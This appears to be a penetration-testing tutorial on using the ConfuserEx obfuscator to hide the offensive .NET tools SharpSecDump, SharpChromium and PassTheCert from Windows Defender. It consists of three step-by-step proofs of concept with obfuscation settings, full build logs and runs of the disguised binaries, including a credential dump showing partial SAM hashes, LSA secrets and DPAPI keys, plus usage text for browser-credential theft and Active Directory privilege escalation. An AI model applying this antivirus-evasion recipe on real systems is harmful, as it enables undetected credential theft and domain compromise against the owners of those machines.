===============================================================================================================================
AV bypass using the obfuscation tool 'ConfuserEx'
===============================================================================================================================

ConfuserEx v2 is an open-source protector for .NET applications. It is the successor of the Confuser project and the ConfuserEx project.

ConfuserEx supports .NET Framework from 2.0 - 4.8, .NET Standard, .NET Core and Mono. 

Sources:
=> https://github.com/mkaring/ConfuserEx
=> https://mkaring.github.io/ConfuserEx/

Features
--------
- Supports .NET Framework 2.0/3.0/3.5/4.0/4.5/4.6/4.7/4.8
- Symbol renaming (Support WPF/BAML)
- Protection against debuggers/profilers
- Protection against memory dumping
- Protection against tampering (method encryption)
- Control flow obfuscation
- Constant/resources encryption
- Reference hiding proxies
- Disable decompilers
- Embedding dependency
- Compressing output
- Extensible plugin API
- Many more are coming!


===============================================================================================================================
PoC 1 - Example with the tool 'SharpSecDump.exe' running on a Windows 10 laptop without being detected by Windows Defender (AV) 
===============================================================================================================================

------------------------------------------------------------------------------------------------------
Step 1. Download, compile and run the tool 'ConfuserEx-GUI'
------------------------------------------------------------------------------------------------------

C:\Users\Administrator\Documents\Tools-Pentest\1-Antivirus-bypass\ConfuserEx-GUI>.\ConfuserEx.exe


------------------------------------------------------------------------------------------------------
Step 2. Go to the 'Project' section
------------------------------------------------------------------------------------------------------

> Drag and drop the C# assembly file 'SharpSecDump.exe' that you want to obfuscate.
  URLs:
  => https://github.com/G0ldenGunSec/SharpSecDump
  => https://github.com/Flangvik/SharpCollection/blob/master/NetFramework_4.7_x64/SharpSecDump.exe
  
> Fill-out the settings 'Base Directory' and 'Output Directory'.


------------------------------------------------------------------------------------------------------
Step 3. Go to the 'Settings' section
------------------------------------------------------------------------------------------------------

> Enable the 'Packer' tickbox and select 'Compressor'

> Select 'SharpSecDump.exe' in 'Modules' 

> Add rules by clicking on the '+' button and selecting obfuscation rules

   For example, I selected the 'Maxium' preset of obfuscation rules which include (not-exhaustive): 
   - Invalid metadata addition
   - Anti-tamper module writer preparation 
   - Anti-tamper helpers injection
   - Anti-tamper metadata preparation
   - Anti-debug injection
   - Anti-dump injection
   - Anti-ILDasm marking
   - Encoding reference proxies
   - Constant encryption helpers injection 
   - Resource encryption helpers injection
   - Control flow mangling
   - ...

------------------------------------------------------------------------------------------------------
Step 4. Go in the 'Protect!' section 
------------------------------------------------------------------------------------------------------

> Click on the button 'Protect!' to generate an obfuscated version of 'SharpSecDump.exe'.

 [INFO] Confuser.Core 1.6.0+447341964f Copyright © 2014 Ki, 2018 - 2022 Martin Karing
 [INFO] Running on Microsoft Windows NT 6.2.9200.0, .NET Framework v4.0.30319.42000, 64 bits
[DEBUG] Discovering plugins...
 [INFO] Discovered 13 protections, 1 packers.
[DEBUG] Resolving component dependency...
 [INFO] Loading input modules...
 [INFO] Loading C:\Users\Administrator\Documents\Tools-Pentest\13-SharpCollection\x64\SharpSecDump.exe...
 [INFO] Initializing...
[DEBUG] Building pipeline...
[DEBUG] Executing Type scanner phase...
 [INFO] Resolving dependencies...
[DEBUG] Checking Strong Name...
[DEBUG] Creating global .cctors...
[DEBUG] Executing Name analysis phase...
[DEBUG] Building VTables & identifier list...
[DEBUG] Analyzing...
 [INFO] Processing module SharpSecDump.exe...
[DEBUG] Executing Invalid metadata addition phase...
[DEBUG] Executing Renaming phase...
[DEBUG] Renaming...
[DEBUG] Executing Anti-tamper module writer preparation phase...
[DEBUG] Executing Anti-debug injection phase...
[DEBUG] Executing Anti-dump injection phase...
[DEBUG] Executing Anti-ILDasm marking phase...
[DEBUG] Executing Encoding reference proxies phase...
[DEBUG] Executing Constant encryption helpers injection phase...
[DEBUG] Executing Resource encryption helpers injection phase...
[DEBUG] Executing Type scrambler phase...
[DEBUG] Executing Constants encoding phase...
[DEBUG] Executing Hardening Phase phase...
[DEBUG] Executing Anti-tamper helpers injection phase...
[DEBUG] Executing Control flow mangling phase...
[DEBUG] Executing Post-renaming phase...
[DEBUG] Executing Anti-tamper metadata preparation phase...
[DEBUG] Executing Apply watermark phase...
[DEBUG] Watermarking...
[DEBUG] Executing Packer info extraction phase...
 [INFO] Writing module koi...
[DEBUG] Encrypting resources...
 [INFO] Finalizing...
 [INFO] Packing...
[DEBUG] Encrypting modules...
 [INFO] Protecting packer stub...
[DEBUG] Discovering plugins...
 [INFO] Discovered 14 protections, 1 packers.
[DEBUG] Resolving component dependency...
 [INFO] Loading input modules...
 [INFO] Loading SharpSecDump.exe...
 [INFO] Initializing...
[DEBUG] Building pipeline...
[DEBUG] Executing Type scanner phase...
[DEBUG] Executing Module injection phase...
 [INFO] Resolving dependencies...
[DEBUG] Checking Strong Name...
[DEBUG] Creating global .cctors...
[DEBUG] Executing Name analysis phase...
[DEBUG] Building VTables & identifier list...
[DEBUG] Analyzing...
 [INFO] Processing module SharpSecDump.exe...
[DEBUG] Executing Packer info encoding phase...
[DEBUG] Executing Invalid metadata addition phase...
[DEBUG] Executing Renaming phase...
[DEBUG] Renaming...
[DEBUG] Executing Anti-tamper module writer preparation phase...
[DEBUG] Executing Anti-debug injection phase...
[DEBUG] Executing Anti-dump injection phase...
[DEBUG] Executing Anti-ILDasm marking phase...
[DEBUG] Executing Encoding reference proxies phase...
[DEBUG] Executing Constant encryption helpers injection phase...
[DEBUG] Executing Resource encryption helpers injection phase...
[DEBUG] Executing Type scrambler phase...
[DEBUG] Executing Constants encoding phase...
[DEBUG] Executing Hardening Phase phase...
[DEBUG] Executing Anti-tamper helpers injection phase...
[DEBUG] Executing Control flow mangling phase...
[DEBUG] Executing Post-renaming phase...
[DEBUG] Executing Anti-tamper metadata preparation phase...
[DEBUG] Executing Apply watermark phase...
[DEBUG] Watermarking...
[DEBUG] Executing Packer info extraction phase...
 [INFO] Writing module SharpSecDump.exe...
 [INFO] Finalizing...
[DEBUG] Saving to C:\Users\Administrator\AppData\Local\Temp\jx41x2hp.wvk\d3kxkusg.nm4\SharpSecDump.exe...
[DEBUG] Executing Export symbol map phase...
 [INFO] Finish protecting packer stub.
[DEBUG] Saving to C:\Users\Administrator\Documents\Tools-Pentest\13-SharpCollection\x64\Confused\SharpSecDump.exe...
[DEBUG] Executing Export symbol map phase...
 [INFO] Done.
Finished at 19:47, 0:00 elapsed.


--------------------------------------------------------------------------------------------------------------------------------------
Step 5. Execute the obfuscated version of 'SharpSecDump.exe' renamed as 'SuperRaoul.exe' without being detected by Windows Defender
--------------------------------------------------------------------------------------------------------------------------------------

PS C:\Users\Administrator\Desktop> systeminfo

Host Name:                 Laptop1
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19044 N/A Build 19044
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Workstation
OS Build Type:             Multiprocessor Free


PS C:\Users\Administrator\Desktop> Get-MpComputerStatus | Select AntivirusEnabled,RealTimeProtectionEnabled,IoavProtectionEnabled,AntispywareEnabled,AntivirusSignatureLastUpdated | FL

AntivirusEnabled              : True
RealTimeProtectionEnabled     : True
IoavProtectionEnabled         : True
AntispywareEnabled            : True
AntivirusSignatureLastUpdated : 09/02/2023 05:51:18


PS C:\Users\Administrator\Desktop> ./SuperRaoul.exe -target=127.0.0.1
[X] Error, unable to bind to service manager on 127
---------------Script execution completed---------------

PS C:\Users\Administrator\Desktop> exit


C:\Users\Administrator\Desktop> SuperRaoul.exe

-----------SharpSecDump Info-----------
Flag usage:  -Flag=setValue
--Required Flags--
-target :: comma seperated list of IPs / hostnames to run against.  Please dont include spaces between addresses
--Optional Flags--
-u :: Username to use, if not running in current users context. Must use with -P and -D flags
-p :: Plaintext password to use, if not running in current users context. Must use with -U and -D flags
-d :: Domain to use, if not running in current users context (. for local). Must use with -U and -P flags
-threads :: Threads to use to concurently enumerate multiple remote hosts (Default: 10)
--Example Format--
SharpSecDump.exe -target=192.168.1.15 -u=admin -p=Password123 -d=test.local


C:\Users\Administrator\Desktop> SuperRaoul.exe -target=127.0.0.1

[*] RemoteRegistry service started on 127.0.0.1
[*] Parsing SAM hive on 127.0.0.1
[*] Parsing SECURITY hive on 127.0.0.1
[*] Sucessfully cleaned up on 127.0.0.1
---------------Results from 127.0.0.1---------------

[*] SAM hashes
Administrator:500:aad3b435b51404eeaad3b435b51404ee:36f7a3ebaa54<SNIP>
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c<SNIP>
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16<SNIP>
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:b3b0692<SNIP>
auditor:1022:aad3b435b51404eeaad3b435b51404ee:3bb631e20efee934f<SNIP>

[*] Cached domain logon information(domain/username:hash)
<SNIP>

[*] LSA Secrets
[*] $MACHINE.ACC
<SNIP>

[*] DPAPI_SYSTEM
dpapi_machinekey:0df3afb5656cb2bbee66eb0a887071<SNIP>
dpapi_userkey:720dd8e5b64f62c5619c6fc0075df6fc1<SNIP>

[*] L$ASP.NETAutoGenKeysV44.0.30319.0
[!] Secret type not supported yet - outputing raw secret as unicode:
??????????????????????????????????????????????????Ë????????????????????????????????????????????????????????????????????¯???????????????????????????????????????????????????????????????????????????????????????????????????????????>
U????????????????????????????????????????????????????????????

[*] L$_SQSA_S-1-5-21-936125016-2310263949-2175806047-1001
[!] Secret type not supported yet - outputing raw secret as unicode:
{'version':1,'questions':[{'question':'What was your first pets name?','answer':'audit'},{'question':'What is the name of the city where you were born?','answer':'audit'},{'question':'What was your childhood nickname?','answer':'audit'}]}

[*] NL$KM
NL$KM:087faeacc974ae07d0316fb4ad1507b87fbd4a1d77ef72dc378d4337f1f424358f<SNIP>
---------------Script execution completed---------------


================================================================================================================================
PoC 2 - Example with the tool 'SharpChromium.exe' running on a Windows 10 laptop without being detected by Windows Defender (AV) 
================================================================================================================================

------------------------------------------------------------------------------------------------------
Step 1. Download, compile and run the tool 'ConfuserEx-GUI'
------------------------------------------------------------------------------------------------------

C:\Users\Administrator\Documents\Tools-Pentest\1-Antivirus-bypass\ConfuserEx-GUI>.\ConfuserEx.exe


------------------------------------------------------------------------------------------------------
Step 2. Go to the 'Project' section
------------------------------------------------------------------------------------------------------

> Drag and drop the C# assembly file 'SharpChromium.exe' that you want to obfuscate.
  URLs:
  => https://github.com/djhohnstein/SharpChromium
  => https://github.com/Flangvik/SharpCollection/blob/master/NetFramework_4.7_x64/SharpChromium.exe
  
> Fill-out the settings 'Base Directory' and 'Output Directory'.


------------------------------------------------------------------------------------------------------
Step 3. Go to the 'Settings' section
------------------------------------------------------------------------------------------------------

> Enable the 'Packer' tickbox and select 'Compressor'

> Select 'SharpChromium.exe' in 'Modules' 

> Add rules by clicking on the '+' button and selecting obfuscation rules

   For example, I selected the 'Agressive' preset of obfuscation rules which include (not-exhaustive): 
   - Invalid metadata addition
   - Anti-tamper module writer preparation 
   - Anti-tamper metadata preparation
   - Anti-debug injection
   - Anti-dump injection
   - Anti-ILDasm marking
   - Encoding reference proxies
   - Constant encryption helpers injection 
   - Resource encryption helpers injection
   - Control flow mangling
   - ...

------------------------------------------------------------------------------------------------------
Step 4. Go in the 'Protect!' section 
------------------------------------------------------------------------------------------------------

> Click on the button 'Protect!' to generate an obfuscated version of SharpChromium.exe.

 [INFO] Confuser.Core 1.6.0+447341964f Copyright © 2014 Ki, 2018 - 2022 Martin Karing
 [INFO] Running on Microsoft Windows NT 6.2.9200.0, .NET Framework v4.0.30319.42000, 64 bits
[DEBUG] Discovering plugins...
 [INFO] Discovered 13 protections, 1 packers.
[DEBUG] Resolving component dependency...
 [INFO] Loading input modules...
 [INFO] Loading 'SharpChromium.exe'...
 [INFO] Initializing...
[DEBUG] Building pipeline...
[DEBUG] Executing 'Type scanner' phase...
 [INFO] Resolving dependencies...
[DEBUG] Checking Strong Name...
[DEBUG] Creating global .cctors...
[DEBUG] Executing 'Name analysis' phase...
[DEBUG] Building VTables & identifier list...
[DEBUG] Analyzing...
 [INFO] Processing module 'SharpChromium.exe'...
[DEBUG] Executing 'Invalid metadata addition' phase...
[DEBUG] Executing 'Renaming' phase...
[DEBUG] Renaming...
[DEBUG] Executing 'Anti-tamper module writer preparation' phase...
[DEBUG] Executing 'Anti-debug injection' phase...
[DEBUG] Executing 'Anti-dump injection' phase...
[DEBUG] Executing 'Anti-ILDasm marking' phase...
[DEBUG] Executing 'Encoding reference proxies' phase...
[DEBUG] Executing 'Constant encryption helpers injection' phase...
[DEBUG] Executing 'Resource encryption helpers injection' phase...
[DEBUG] Executing 'Type scrambler' phase...
[DEBUG] Executing 'Constants encoding' phase...
[DEBUG] Executing 'Hardening Phase' phase...
[DEBUG] Executing 'Anti-tamper helpers injection' phase...
[DEBUG] Executing 'Control flow mangling' phase...
[DEBUG] Executing 'Post-renaming' phase...
[DEBUG] Executing 'Anti-tamper metadata preparation' phase...
[DEBUG] Executing 'Apply watermark' phase...
[DEBUG] Watermarking...
[DEBUG] Executing 'Packer info extraction' phase...
 [INFO] Writing module 'koi'...
[DEBUG] Encrypting resources...
 [INFO] Finalizing...
 [INFO] Packing...
[DEBUG] Encrypting modules...
 [INFO] Protecting packer stub...
[DEBUG] Discovering plugins...
 [INFO] Discovered 14 protections, 1 packers.
[DEBUG] Resolving component dependency...
 [INFO] Loading input modules...
 [INFO] Loading 'SharpChromium.exe'...
 [INFO] Initializing...
[DEBUG] Building pipeline...
[DEBUG] Executing 'Type scanner' phase...
[DEBUG] Executing 'Module injection' phase...
 [INFO] Resolving dependencies...
[DEBUG] Checking Strong Name...
[DEBUG] Creating global .cctors...
[DEBUG] Executing 'Name analysis' phase...
[DEBUG] Building VTables & identifier list...
[DEBUG] Analyzing...
 [INFO] Processing module 'SharpChromium.exe'...
[DEBUG] Executing 'Packer info encoding' phase...
[DEBUG] Executing 'Invalid metadata addition' phase...
[DEBUG] Executing 'Renaming' phase...
[DEBUG] Renaming...
[DEBUG] Executing 'Anti-tamper module writer preparation' phase...
[DEBUG] Executing 'Anti-debug injection' phase...
[DEBUG] Executing 'Anti-dump injection' phase...
[DEBUG] Executing 'Anti-ILDasm marking' phase...
[DEBUG] Executing 'Encoding reference proxies' phase...
[DEBUG] Executing 'Constant encryption helpers injection' phase...
[DEBUG] Executing 'Resource encryption helpers injection' phase...
[DEBUG] Executing 'Type scrambler' phase...
[DEBUG] Executing 'Constants encoding' phase...
[DEBUG] Executing 'Hardening Phase' phase...
[DEBUG] Executing 'Anti-tamper helpers injection' phase...
[DEBUG] Executing 'Control flow mangling' phase...
[DEBUG] Executing 'Post-renaming' phase...
[DEBUG] Executing 'Anti-tamper metadata preparation' phase...
[DEBUG] Executing 'Apply watermark' phase...
[DEBUG] Watermarking...
[DEBUG] Executing 'Packer info extraction' phase...
 [INFO] Writing module 'SharpChromium.exe'...
 [INFO] Finalizing...
[DEBUG] Saving to 'C:\Users\Administrator\AppData\Local\Temp\t1gegqhd.enj\4qa1lpka.zfb\SharpChromium.exe'...
[DEBUG] Executing 'Export symbol map' phase...
 [INFO] Finish protecting packer stub.
[DEBUG] Saving to 'C:\Users\Administrator\Documents\Tools-Pentest\13-SharpCollection\x64\Confused\SharpChromium.exe'...
[DEBUG] Executing 'Export symbol map' phase...
 [INFO] Done.
Finished at 20:41, 0:01 elapsed.


--------------------------------------------------------------------------------------------------------------------------------------------------
Step 5. Execute the obfuscated version of 'SharpChromium.exe' renamed as 'ConfuserEx-SharpChromium.exe' without being detected by Windows Defender
--------------------------------------------------------------------------------------------------------------------------------------------------

C:\Users\Administrator\Desktop>powershell -exec bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\Administrator\Desktop> systeminfo

Host Name:                 Laptop1
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19044 N/A Build 19044
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Workstation
OS Build Type:             Multiprocessor Free


PS C:\Users\Administrator\Desktop> Get-MpComputerStatus | Select AntivirusEnabled,RealTimeProtectionEnabled,IoavProtectionEnabled,AntispywareEnabled,AntivirusSignatureLastUpdated | FL

AntivirusEnabled              : True
RealTimeProtectionEnabled     : True
IoavProtectionEnabled         : True
AntispywareEnabled            : True
AntivirusSignatureLastUpdated : 09/02/2023 05:51:18


PS C:\Users\Administrator\Desktop> .\ConfuserEx-SharpChromium.exe

Usage:
    .\SharpChromium.exe arg0 [arg1 arg2 ...]

Arguments:
    all       - Retrieve all Chromium Cookies, History and Logins.
    full      - The same as 'all'
    logins    - Retrieve all saved credentials that have non-empty passwords.
    history   - Retrieve user's history with a count of each time the URL was
                visited, along with cookies matching those items.
    cookies [domain1.com domain2.com] - Retrieve the user's cookies in JSON format.
                                        If domains are passed, then return only
                                        cookies matching those domains. Otherwise,
                                        all cookies are saved into a temp file of
                                        the format "%TEMP%\$browser-cookies.json"


================================================================================================================================
PoC 3 - Example with the tool 'PassTheCert.exe' running on a Windows 10 laptop without being detected by Windows Defender (AV) 
================================================================================================================================

Same procedure than for the previous examples
----------------------------------------------

=> I selected the 'Agressive' preset of obfuscation rules in ConfuserEX:

 [INFO] Confuser.Core 1.6.0+447341964f Copyright © 2014 Ki, 2018 - 2022 Martin Karing
 [INFO] Running on Microsoft Windows NT 6.2.9200.0, .NET Framework v4.0.30319.42000, 64 bits
[DEBUG] Discovering plugins...
 [INFO] Discovered 13 protections, 1 packers.
[DEBUG] Resolving component dependency...
 [INFO] Loading input modules...
 [INFO] Loading 'PassTheCert.exe'...
 [INFO] Initializing...
[DEBUG] Building pipeline...
[DEBUG] Executing 'Type scanner' phase...
 [INFO] Resolving dependencies...
[DEBUG] Checking Strong Name...
[DEBUG] Creating global .cctors...
[DEBUG] Executing 'Name analysis' phase...
[DEBUG] Building VTables & identifier list...
[DEBUG] Analyzing...
 [INFO] Processing module 'PassTheCert.exe'...
[DEBUG] Executing 'Invalid metadata addition' phase...
[DEBUG] Executing 'Renaming' phase...
[DEBUG] Renaming...
[DEBUG] Executing 'Anti-tamper module writer preparation' phase...
[DEBUG] Executing 'Anti-debug injection' phase...
[DEBUG] Executing 'Anti-dump injection' phase...
[DEBUG] Executing 'Anti-ILDasm marking' phase...
[DEBUG] Executing 'Encoding reference proxies' phase...
[DEBUG] Executing 'Constant encryption helpers injection' phase...
[DEBUG] Executing 'Resource encryption helpers injection' phase...
[DEBUG] Executing 'Type scrambler' phase...
[DEBUG] Executing 'Constants encoding' phase...
[DEBUG] Executing 'Hardening Phase' phase...
[DEBUG] Executing 'Anti-tamper helpers injection' phase...
[DEBUG] Executing 'Control flow mangling' phase...
[DEBUG] Executing 'Post-renaming' phase...
[DEBUG] Executing 'Anti-tamper metadata preparation' phase...
[DEBUG] Executing 'Apply watermark' phase...
[DEBUG] Watermarking...
[DEBUG] Executing 'Packer info extraction' phase...
 [INFO] Writing module 'koi'...
[DEBUG] Encrypting resources...
 [INFO] Finalizing...
 [INFO] Packing...
[DEBUG] Encrypting modules...
 [INFO] Protecting packer stub...
[DEBUG] Discovering plugins...
 [INFO] Discovered 14 protections, 1 packers.
[DEBUG] Resolving component dependency...
 [INFO] Loading input modules...
 [INFO] Loading 'PassTheCert.exe'...
 [INFO] Initializing...
[DEBUG] Building pipeline...
[DEBUG] Executing 'Type scanner' phase...
[DEBUG] Executing 'Module injection' phase...
 [INFO] Resolving dependencies...
[DEBUG] Checking Strong Name...
[DEBUG] Creating global .cctors...
[DEBUG] Executing 'Name analysis' phase...
[DEBUG] Building VTables & identifier list...
[DEBUG] Analyzing...
 [INFO] Processing module 'PassTheCert.exe'...
[DEBUG] Executing 'Packer info encoding' phase...
[DEBUG] Executing 'Invalid metadata addition' phase...
[DEBUG] Executing 'Renaming' phase...
[DEBUG] Renaming...
[DEBUG] Executing 'Anti-tamper module writer preparation' phase...
[DEBUG] Executing 'Anti-debug injection' phase...
[DEBUG] Executing 'Anti-dump injection' phase...
[DEBUG] Executing 'Anti-ILDasm marking' phase...
[DEBUG] Executing 'Encoding reference proxies' phase...
[DEBUG] Executing 'Constant encryption helpers injection' phase...
[DEBUG] Executing 'Resource encryption helpers injection' phase...
[DEBUG] Executing 'Type scrambler' phase...
[DEBUG] Executing 'Constants encoding' phase...
[DEBUG] Executing 'Hardening Phase' phase...
[DEBUG] Executing 'Anti-tamper helpers injection' phase...
[DEBUG] Executing 'Control flow mangling' phase...
[DEBUG] Executing 'Post-renaming' phase...
[DEBUG] Executing 'Anti-tamper metadata preparation' phase...
[DEBUG] Executing 'Apply watermark' phase...
[DEBUG] Watermarking...
[DEBUG] Executing 'Packer info extraction' phase...
 [INFO] Writing module 'PassTheCert.exe'...
 [INFO] Finalizing...
[DEBUG] Saving to 'C:\Users\Administrator\AppData\Local\Temp\yfsuig3y.oe4\zptjsdfk.qgg\PassTheCert.exe'...
[DEBUG] Executing 'Export symbol map' phase...
 [INFO] Finish protecting packer stub.
[DEBUG] Saving to 'C:\Users\Administrator\Documents\Tools-Pentest\13-SharpCollection\x64\Confused\PassTheCert.exe'...
[DEBUG] Executing 'Export symbol map' phase...
 [INFO] Done.
Finished at 00:15, 0:01 elapsed.


Then execute the obfuscated version of 'PassTheCert.exe' renamed as 'ConfuserEx-PassTheCert.exe' without being detected by Windows Defender
--------------------------------------------------------------------------------------------------------------------------------------------

C:\Temp>powershell -exec bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. Tous droits réservés.

Testez le nouveau système multiplateforme PowerShell https://aka.ms/pscore6

PS C:\Temp> Get-MpComputerStatus | Select AntivirusEnabled,RealTimeProtectionEnabled,IoavProtectionEnabled,AntispywareEnabled,AntivirusSignatureLastUpdated | FL

AntivirusEnabled              : True
RealTimeProtectionEnabled     : True
IoavProtectionEnabled         : True
AntispywareEnabled            : True
AntivirusSignatureLastUpdated : 20/02/2023 15:55:30


PS C:\Temp> .\ConfuserEx-PassTheCert.exe --help

PassTheCert.exe [--help] --server DOMAIN_CONTROLLER [--start-tls] --cert-path CERT_PATH [--cert-password CERT_PASSWORD] (--elevate|--rbcd|--add-computer|--reset-password) [ATTACK_OPTIONS]
GENERAL OPTIONS:
        --server DOMAIN_CONTROLLER
                Domain controller to connect to. By default, connection will be done over TCP/636 (LDAPS).
        --start-tls
                Indicates that connection should instead be done over TCP/389 (LDAP) and then use StartTLS.
        --cert-path CERT_PATH
                Path to the certificate to authenticate with.
        --cert-password CERT_PASSWORD
                Password to the certificate (Optional argument. Default value: <empty>).

ATTACK TYPE:
        --whoami
                Query LDAP whoami to check if strict validation is being checked
        --elevate
                Elevate the rights of a user on the domain. Will grant DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights.
        --rbcd
                Adds an SID to the msDS-AllowedToActOnBehalfOfOtherIdentity arttribute of the target.
        --add-computer
                Add a new computer to the domain (useful for RBCD attacks).
        --reset-password
                Reset the password of the targeted account (requires the User-Force-Change-Password right).

ELEVATE ATTACK OPTIONS: --target TARGET (--sid SID|--restore RESTORE_FILE)
        --target TARGET
                Target of the attack. Should be the distinguished name of the domain.
        --sid SID
                SID to elevate.
        --restore RESTORE_FILE
                File from which to restore the msDS-nTSecurityDescriptor attribute.
                You can use --restore clear to clear the attribute.

RBCD ATTACK OPTIONS: --target TARGET (--sid SID|--restore RESTORE_FILE)
        --target TARGET
                Target of the attack. Should be the distinguished name of the computer.
        --sid SID
                SID to grant RBCD rights to.
        --restore RESTORE_FILE
                File from which to restore the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
                You can use --restore clear to clear the attribute.

ADD COMPUTER ATTACK OPTIONS: --computer-name COMPUTER_NAME [--computer-password COMPUTER_PASSWORD]
        --computer-name COMPUTER_NAME
                The name of the computer to add.
        --computer-password COMPUTER_PASSWORD
                The password of the new computer (Optional argument. Default value: <random value>).

RESET PASSWORD ATTACK OPTIONS: --target TARGET [--new-password NEW_PASSWORD]
        --target TARGET
                Target of the attack. Should be the distinguished name of the account.
        --new-password new_PASSWORD
                The new password of the account (Optional argument. Default value: <random value>).

Examples:

PassTheCert.exe --server ad.contoso.com --cert-path C:\exchange_server.pfx --elevate --target DC=contoso,DC=com --sid S-1-5-21-453406510-812318184-4183662089-1337
        └> Grants DCSync replication rights on domain contoso.com to SID S-1-5-21-453406510-812318184-4183662089-1337.

PassTheCert.exe --server ad.contoso.com --cert-path C:\ad1.pfx --rbcd --target "CN=AD1,OU=Domain Controllers,DC=contoso,DC=com" --sid S-1-5-21-453406510-812318184-4183662089-1337
        └> Grants RBCD rights on domain controller AD1 to SID S-1-5-21-453406510-812318184-4183662089-1337.

PassTheCert.exe --server ad.contoso.com --cert-path C:\ad1.pfx --rbcd --target "CN=AD1,OU=Domain Controllers,DC=contoso,DC=com" --restore --restore CN=AD1,OU=Domain_Controllers,DC=contoso,DC=com_msDS-AllowedToActOnBehalfOfOtherIdentity_20220415T224638Z.txt
        └> Sets AD1's msDS-AllowedToActOnBehalfOfOtherIdentity attribute to the value stord in the given file.

PassTheCert.exe --server ad.contoso.com --cert-path C:\user.pfx --add-computer --computer-name DESKTOP-1337$
        └> Create new computer DESKTOP-1337$ with a randomly generated password.

